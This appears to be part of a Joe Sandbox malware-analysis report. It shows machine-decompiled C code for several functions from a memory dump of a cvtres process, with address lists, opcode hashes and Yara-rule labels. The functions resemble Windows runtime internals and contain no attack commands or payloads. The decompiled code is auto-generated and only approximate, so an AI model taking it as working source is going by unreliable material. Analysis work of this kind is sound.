                                                                        0x055da704
                                                                        0x00000000
                                                                        0x055da704
                                                                        0x055da6d4
                                                                        0x055da6d6
                                                                        0x055da6d9
                                                                        0x055da6db
                                                                        0x055da6e1
                                                                        0x055da6e6
                                                                        0x055da6e8
                                                                        0x055da6e8
                                                                        0x055da6ea
                                                                        0x00000000
                                                                        0x055da6ea
                                                                        0x055da688
                                                                        0x055da692
                                                                        0x055da694
                                                                        0x055da699
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055da69d
                                                                        0x00000000

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d6e6e03d14bffd1975c1971b2bd917a7b5e9b6ac5ce51cf6c76f30212bfcd97c
                                                                        • Instruction ID: 2c72a3e0578020fe4a6f801007e71ff9fa277c51fdf2508802541b5672f8f6fb
                                                                        • Opcode Fuzzy Hash: d6e6e03d14bffd1975c1971b2bd917a7b5e9b6ac5ce51cf6c76f30212bfcd97c
                                                                        • Instruction Fuzzy Hash: 25418D76A14209DFCB15CF58C590BAEBBF2FF49304F1880A9E805AB345D775A941CFA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055CC182 Relevance: .1, Instructions: 104COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 68%
                                                                        			E055CC182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E055C7D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E05678D34(_v8, _t80);
					}
					E055C2280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E055BFFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E05678833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E055BFFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E055EB180();
						if(_a4 != 0) {
							E055C2280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E055CBB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E055CBB2D(_t16, _t15);
						E055CB944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E055BFFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E055BFFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E055BFFB0(0, __ecx, _t24);
				}
				return 0;
			}
















                                                                        0x055cc18d
                                                                        0x055cc18f
                                                                        0x055cc191
                                                                        0x055cc19b
                                                                        0x055cc1a0
                                                                        0x055cc1d4
                                                                        0x055cc1de
                                                                        0x05612d6e
                                                                        0x055cc1e4
                                                                        0x055cc1e4
                                                                        0x055cc1e4
                                                                        0x055cc1ec
                                                                        0x05612d7d
                                                                        0x05612d7d
                                                                        0x055cc1f3
                                                                        0x055cc1ff
                                                                        0x05612d88
                                                                        0x05612d8d
                                                                        0x05612d94
                                                                        0x05612d94
                                                                        0x05612d9f
                                                                        0x05612da4
                                                                        0x05612dab
                                                                        0x05612db0
                                                                        0x05612db2
                                                                        0x05612db3
                                                                        0x05612db4
                                                                        0x05612dbc
                                                                        0x05612dc3
                                                                        0x05612dc3
                                                                        0x055cc205
                                                                        0x055cc205
                                                                        0x055cc208
                                                                        0x055cc20e
                                                                        0x055cc211
                                                                        0x055cc216
                                                                        0x055cc219
                                                                        0x055cc21f
                                                                        0x055cc222
                                                                        0x055cc22c
                                                                        0x055cc234
                                                                        0x055cc23a
                                                                        0x055cc23f
                                                                        0x055cc245
                                                                        0x055cc24b
                                                                        0x055cc251
                                                                        0x055cc25a
                                                                        0x055cc276
                                                                        0x055cc27d
                                                                        0x055cc27d
                                                                        0x055cc25c
                                                                        0x055cc25c
                                                                        0x00000000
                                                                        0x055cc25e
                                                                        0x055cc1a4
                                                                        0x055cc1aa
                                                                        0x055cc1b3
                                                                        0x055cc265
                                                                        0x055cc26c
                                                                        0x055cc26c
                                                                        0x00000000

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                        • Instruction ID: 737878a1d2bec9fd320fdbac1bcfa79348219dd69fef33f5d8f006de96de1377
                                                                        • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                        • Instruction Fuzzy Hash: 56310372B0558BAED704EBF5C898BE9FB55BF82304F08419EC42D47201DB746E05CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 05627016 Relevance: .1, Instructions: 104COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 76%
                                                                        			E05627016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x569d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E05626B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E05626B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E055C7D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E055E9AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L055C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E055EB640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L055C4620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}






















                                                                        0x05627016
                                                                        0x0562701e
                                                                        0x0562702b
                                                                        0x05627033
                                                                        0x05627037
                                                                        0x0562703c
                                                                        0x0562703e
                                                                        0x05627041
                                                                        0x05627045
                                                                        0x0562704a
                                                                        0x05627050
                                                                        0x05627055
                                                                        0x0562705a
                                                                        0x05627062
                                                                        0x05627062
                                                                        0x0562705a
                                                                        0x05627064
                                                                        0x05627064
                                                                        0x05627067
                                                                        0x05627071
                                                                        0x05627096
                                                                        0x0562709b
                                                                        0x056270a2
                                                                        0x056270a6
                                                                        0x056270a7
                                                                        0x056270ad
                                                                        0x056270b3
                                                                        0x056270b6
                                                                        0x056270bb
                                                                        0x056270c3
                                                                        0x056270c3
                                                                        0x056270c6
                                                                        0x056270cd
                                                                        0x056270dd
                                                                        0x056270e0
                                                                        0x056270e2
                                                                        0x056270e2
                                                                        0x056270ee
                                                                        0x05627101
                                                                        0x056270f0
                                                                        0x056270f9
                                                                        0x056270f9
                                                                        0x0562710a
                                                                        0x0562710e
                                                                        0x05627112
                                                                        0x05627117
                                                                        0x05627118
                                                                        0x05627118
                                                                        0x056270bb
                                                                        0x0562711d
                                                                        0x05627123
                                                                        0x05627131
                                                                        0x05627131
                                                                        0x05627136
                                                                        0x0562713d
                                                                        0x0562713e
                                                                        0x0562713f
                                                                        0x0562714a
                                                                        0x0562714a
                                                                        0x05627084
                                                                        0x05627088
                                                                        0x00000000
                                                                        0x0562708e
                                                                        0x0562708e
                                                                        0x05627092
                                                                        0x00000000
                                                                        0x05627092

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b063141a51a0da6ff80642a27b15ba67c2fad8a55ea915ef37f28ddcb5716a2f
                                                                        • Instruction ID: 5d12455a5b8785f77f5d0064a0c0a9017f0210db3d958141b1a157cc7ce2078b
                                                                        • Opcode Fuzzy Hash: b063141a51a0da6ff80642a27b15ba67c2fad8a55ea915ef37f28ddcb5716a2f
                                                                        • Instruction Fuzzy Hash: BA3186726087519BC310DF69C945E6AB7A5FFC8700F04461DF89687B90E730E914CBA6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 05653D40 Relevance: .1, Instructions: 98COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 70%
                                                                        			E05653D40(intOrPtr __ecx, char* __edx) {
				signed int _v8;
				char* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed char _v24;
				char _v28;
				char _v29;
				intOrPtr* _v32;
				char _v36;
				char _v37;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char _t34;
				intOrPtr* _t37;
				intOrPtr* _t42;
				intOrPtr* _t47;
				intOrPtr* _t48;
				intOrPtr* _t49;
				char _t51;
				void* _t52;
				intOrPtr* _t53;
				char* _t55;
				char _t59;
				char* _t61;
				intOrPtr* _t64;
				void* _t65;
				char* _t67;
				void* _t68;
				signed int _t70;

				_t62 = __edx;
				_t72 = (_t70 & 0xfffffff8) - 0x1c;
				_v8 =  *0x569d360 ^ (_t70 & 0xfffffff8) - 0x0000001c;
				_t34 =  &_v28;
				_v20 = __ecx;
				_t67 = __edx;
				_v24 = _t34;
				_t51 = 0;
				_v12 = __edx;
				_v29 = 0;
				_v28 = _t34;
				E055C2280(_t34, 0x5698a6c);
				_t64 =  *0x5695768; // 0x77e05768
				if(_t64 != 0x5695768) {
					while(1) {
						_t8 = _t64 + 8; // 0x77e05770
						_t42 = _t8;
						_t53 = _t64;
						 *_t42 =  *_t42 + 1;
						_v16 = _t42;
						E055BFFB0(_t53, _t64, 0x5698a6c);
						 *0x569b1e0(_v24, _t67);
						if( *((intOrPtr*)( *((intOrPtr*)(_t64 + 0xc))))() != 0) {
							_v37 = 1;
						}
						E055C2280(_t45, 0x5698a6c);
						_t47 = _v28;
						_t64 =  *_t64;
						 *_t47 =  *_t47 - 1;
						if( *_t47 != 0) {
							goto L8;
						}
						if( *((intOrPtr*)(_t64 + 4)) != _t53) {
							L10:
							_push(3);
							asm("int 0x29");
						} else {
							_t48 =  *((intOrPtr*)(_t53 + 4));
							if( *_t48 != _t53) {
								goto L10;
							} else {
								 *_t48 = _t64;
								_t61 =  &_v36;
								 *((intOrPtr*)(_t64 + 4)) = _t48;
								_t49 = _v32;
								if( *_t49 != _t61) {
									goto L10;
								} else {
									 *_t53 = _t61;
									 *((intOrPtr*)(_t53 + 4)) = _t49;
									 *_t49 = _t53;
									_v32 = _t53;
									goto L8;
								}
							}
						}
						L11:
						_t51 = _v29;
						goto L12;
						L8:
						if(_t64 != 0x5695768) {
							_t67 = _v20;
							continue;
						}
						goto L11;
					}
				}
				L12:
				E055BFFB0(_t51, _t64, 0x5698a6c);
				while(1) {
					_t37 = _v28;
					_t55 =  &_v28;
					if(_t37 == _t55) {
						break;
					}
					if( *((intOrPtr*)(_t37 + 4)) != _t55) {
						goto L10;
					} else {
						_t59 =  *_t37;
						if( *((intOrPtr*)(_t59 + 4)) != _t37) {
							goto L10;
						} else {
							_t62 =  &_v28;
							_v28 = _t59;
							 *((intOrPtr*)(_t59 + 4)) =  &_v28;
							L055C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t37);
							continue;
						}
					}
					L18:
				}
				_pop(_t65);
				_pop(_t68);
				_pop(_t52);
				return E055EB640(_t51, _t52, _v8 ^ _t72, _t62, _t65, _t68);
				goto L18;
			}

































                                                                        0x05653d40
                                                                        0x05653d48
                                                                        0x05653d52
                                                                        0x05653d59
                                                                        0x05653d5d
                                                                        0x05653d61
                                                                        0x05653d63
                                                                        0x05653d67
                                                                        0x05653d69
                                                                        0x05653d72
                                                                        0x05653d76
                                                                        0x05653d7a
                                                                        0x05653d7f
                                                                        0x05653d8b
                                                                        0x05653d91
                                                                        0x05653d91
                                                                        0x05653d91
                                                                        0x05653d94
                                                                        0x05653d96
                                                                        0x05653d9d
                                                                        0x05653da1
                                                                        0x05653db0
                                                                        0x05653dba
                                                                        0x05653dbc
                                                                        0x05653dbc
                                                                        0x05653dc6
                                                                        0x05653dcb
                                                                        0x05653dcf
                                                                        0x05653dd1
                                                                        0x05653dd4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05653dd9
                                                                        0x05653e0c
                                                                        0x05653e0c
                                                                        0x05653e0f
                                                                        0x05653ddb
                                                                        0x05653ddb
                                                                        0x05653de0
                                                                        0x00000000
                                                                        0x05653de2
                                                                        0x05653de2
                                                                        0x05653de4
                                                                        0x05653de8
                                                                        0x05653deb
                                                                        0x05653df1
                                                                        0x00000000
                                                                        0x05653df3
                                                                        0x05653df3
                                                                        0x05653df5
                                                                        0x05653df8
                                                                        0x05653dfa
                                                                        0x00000000
                                                                        0x05653dfa
                                                                        0x05653df1
                                                                        0x05653de0
                                                                        0x05653e11
                                                                        0x05653e11
                                                                        0x00000000
                                                                        0x05653dfe
                                                                        0x05653e04
                                                                        0x05653e06
                                                                        0x00000000
                                                                        0x05653e06
                                                                        0x00000000
                                                                        0x05653e04
                                                                        0x05653d91
                                                                        0x05653e15
                                                                        0x05653e1a
                                                                        0x05653e1f
                                                                        0x05653e1f
                                                                        0x05653e23
                                                                        0x05653e29
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05653e2e
                                                                        0x00000000
                                                                        0x05653e30
                                                                        0x05653e30
                                                                        0x05653e35
                                                                        0x00000000
                                                                        0x05653e37
                                                                        0x05653e3e
                                                                        0x05653e42
                                                                        0x05653e48
                                                                        0x05653e4e
                                                                        0x00000000
                                                                        0x05653e4e
                                                                        0x05653e35
                                                                        0x00000000
                                                                        0x05653e2e
                                                                        0x05653e5b
                                                                        0x05653e5c
                                                                        0x05653e5d
                                                                        0x05653e68
                                                                        0x00000000

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: adc6336073f5f4085289978120bc145f5e38db3b417e7eed61bf4f333072d240
                                                                        • Instruction ID: 4e007d5672f716c6f16ffa809fba42ec9d7323fa92f0b58f0137170eb8fb040a
                                                                        • Opcode Fuzzy Hash: adc6336073f5f4085289978120bc145f5e38db3b417e7eed61bf4f333072d240
                                                                        • Instruction Fuzzy Hash: 5D319A72649302CFCB14DF18C58482ABBE5FF85B64F04496EE8899B750DB30E905CB92
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055DA70E Relevance: .1, Instructions: 96COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 92%
                                                                        			E055DA70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x5697b10; // 0x0
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x5697b10 = 8;
					 *0x5697b14 = 0x5697b0c;
					 *0x5697b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x1
					E055DA990(0x5697b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L055DA840(__edx, __ecx, __ecx, _t52, 0x5697b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x5697b10; // 0x0
					_t3 = _t37 + 0x27; // 0x27
					__eflags = _t3 >> 5 -  *0x5697b18; // 0x0
					if(__eflags > 0) {
						_t38 =  *0x5697b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x27
						_v8 = _t4 >> 5;
						_t50 = L055C4620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x5697b18 = _v8;
						_t8 = _t52 + 7; // 0x7
						E055EF3E0(_t50,  *0x5697b14, _t8 >> 3);
						_t28 =  *0x5697b14; // 0x0
						__eflags = _t28 - 0x5697b0c;
						if(_t28 != 0x5697b0c) {
							L055C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x8
						 *0x5697b14 = _t50;
						_t48 = _v12;
						 *0x5697b10 = _t9;
						goto L6;
					}
					 *0x5697b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}
















                                                                        0x055da713
                                                                        0x055da714
                                                                        0x055da717
                                                                        0x055da71d
                                                                        0x055da720
                                                                        0x055da722
                                                                        0x055da727
                                                                        0x055da74a
                                                                        0x055da754
                                                                        0x055da75e
                                                                        0x055da768
                                                                        0x055da76a
                                                                        0x055da773
                                                                        0x055da78b
                                                                        0x055da790
                                                                        0x055da792
                                                                        0x055da741
                                                                        0x055da741
                                                                        0x055da743
                                                                        0x055da749
                                                                        0x055da749
                                                                        0x055da732
                                                                        0x055da73a
                                                                        0x055da797
                                                                        0x055da79d
                                                                        0x055da7a3
                                                                        0x055da7a9
                                                                        0x055da7b6
                                                                        0x055da7bc
                                                                        0x055da7ca
                                                                        0x055da7e0
                                                                        0x055da7e2
                                                                        0x055da7e4
                                                                        0x05619bf2
                                                                        0x00000000
                                                                        0x05619bf2
                                                                        0x055da7ed
                                                                        0x055da7f2
                                                                        0x055da800
                                                                        0x055da805
                                                                        0x055da80d
                                                                        0x055da812
                                                                        0x05619c08
                                                                        0x05619c08
                                                                        0x055da818
                                                                        0x055da81b
                                                                        0x055da821
                                                                        0x055da824
                                                                        0x00000000
                                                                        0x055da824
                                                                        0x055da7ae
                                                                        0x00000000
                                                                        0x055da7ae
                                                                        0x055da73c
                                                                        0x055da73e
                                                                        0x00000000

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a3d4da86d3ac0464b8364d0330493203efe9ff867021b86648a7406fc4b8e0a7
                                                                        • Instruction ID: c193b16a381e2aed01f5e3d8ca07e50fd1582bcca911583869189aefeb79698a
                                                                        • Opcode Fuzzy Hash: a3d4da86d3ac0464b8364d0330493203efe9ff867021b86648a7406fc4b8e0a7
                                                                        • Instruction Fuzzy Hash: 81318FB26342099FCB25CF18D891F6ABBFEFB86710F14495AF41587249DBB09901CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055D61A0 Relevance: .1, Instructions: 93COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 97%
                                                                        			E055D61A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E055D5E50(0x55867cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E05679D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E055AF7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}



















                                                                        0x055d61b3
                                                                        0x055d61b5
                                                                        0x055d61bd
                                                                        0x055d61c3
                                                                        0x055d61c7
                                                                        0x055d61d2
                                                                        0x055d61ff
                                                                        0x055d61ff
                                                                        0x055d6201
                                                                        0x055d6207
                                                                        0x055d6207
                                                                        0x055d61d4
                                                                        0x055d61d9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055d61df
                                                                        0x055d61e2
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055d61e6
                                                                        0x055d61e8
                                                                        0x055d61ee
                                                                        0x055d61ee
                                                                        0x055d61f9
                                                                        0x0561762f
                                                                        0x05617632
                                                                        0x05617635
                                                                        0x05617639
                                                                        0x05617640
                                                                        0x0561766e
                                                                        0x05617675
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05617681
                                                                        0x05617689
                                                                        0x0561768d
                                                                        0x05617691
                                                                        0x05617695
                                                                        0x05617699
                                                                        0x056176af
                                                                        0x056176b5
                                                                        0x056176b7
                                                                        0x056176b7
                                                                        0x056176d7
                                                                        0x056176dc
                                                                        0x00000000
                                                                        0x056176dc
                                                                        0x056176a2
                                                                        0x056176a9
                                                                        0x05617651
                                                                        0x05617653
                                                                        0x05617653
                                                                        0x05617656
                                                                        0x05617656
                                                                        0x00000000
                                                                        0x05617656
                                                                        0x05617644
                                                                        0x05617646
                                                                        0x05617648
                                                                        0x05617648
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c94de222dd1e086402a04da0302473fe0d0509f1ff9538d2929abb822d47c6b5
                                                                        • Instruction ID: 40b2cdc7d7ca624a9f5e5eda1a99d71074c647fe8c7fd33ca164e176f9424921
                                                                        • Opcode Fuzzy Hash: c94de222dd1e086402a04da0302473fe0d0509f1ff9538d2929abb822d47c6b5
                                                                        • Instruction Fuzzy Hash: 863169726097018FD720CF5DC800B2AF7E5FB88B00F09496DE8999B751E7B0E985CBA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055AAA16 Relevance: .1, Instructions: 93COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 95%
                                                                        			E055AAA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x569d360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x5697b9c; // 0x0
					_t53 = L055C4620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E055EB640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E055EF3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L055B6C59(_t53, _t51, _t58) != 0) {
							_t28 = E055D5E50(0x558c338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E055DB230(_v32, _v28, 0x558c2d8, 1,  &_v24);
								_t28 = E055AF7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L055C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}




















                                                                        0x055aaa25
                                                                        0x055aaa29
                                                                        0x055aaa2d
                                                                        0x055aaa30
                                                                        0x055aaa37
                                                                        0x055aaa3c
                                                                        0x05604458
                                                                        0x05604458
                                                                        0x05604472
                                                                        0x05604474
                                                                        0x05604476
                                                                        0x055aaa64
                                                                        0x055aaa74
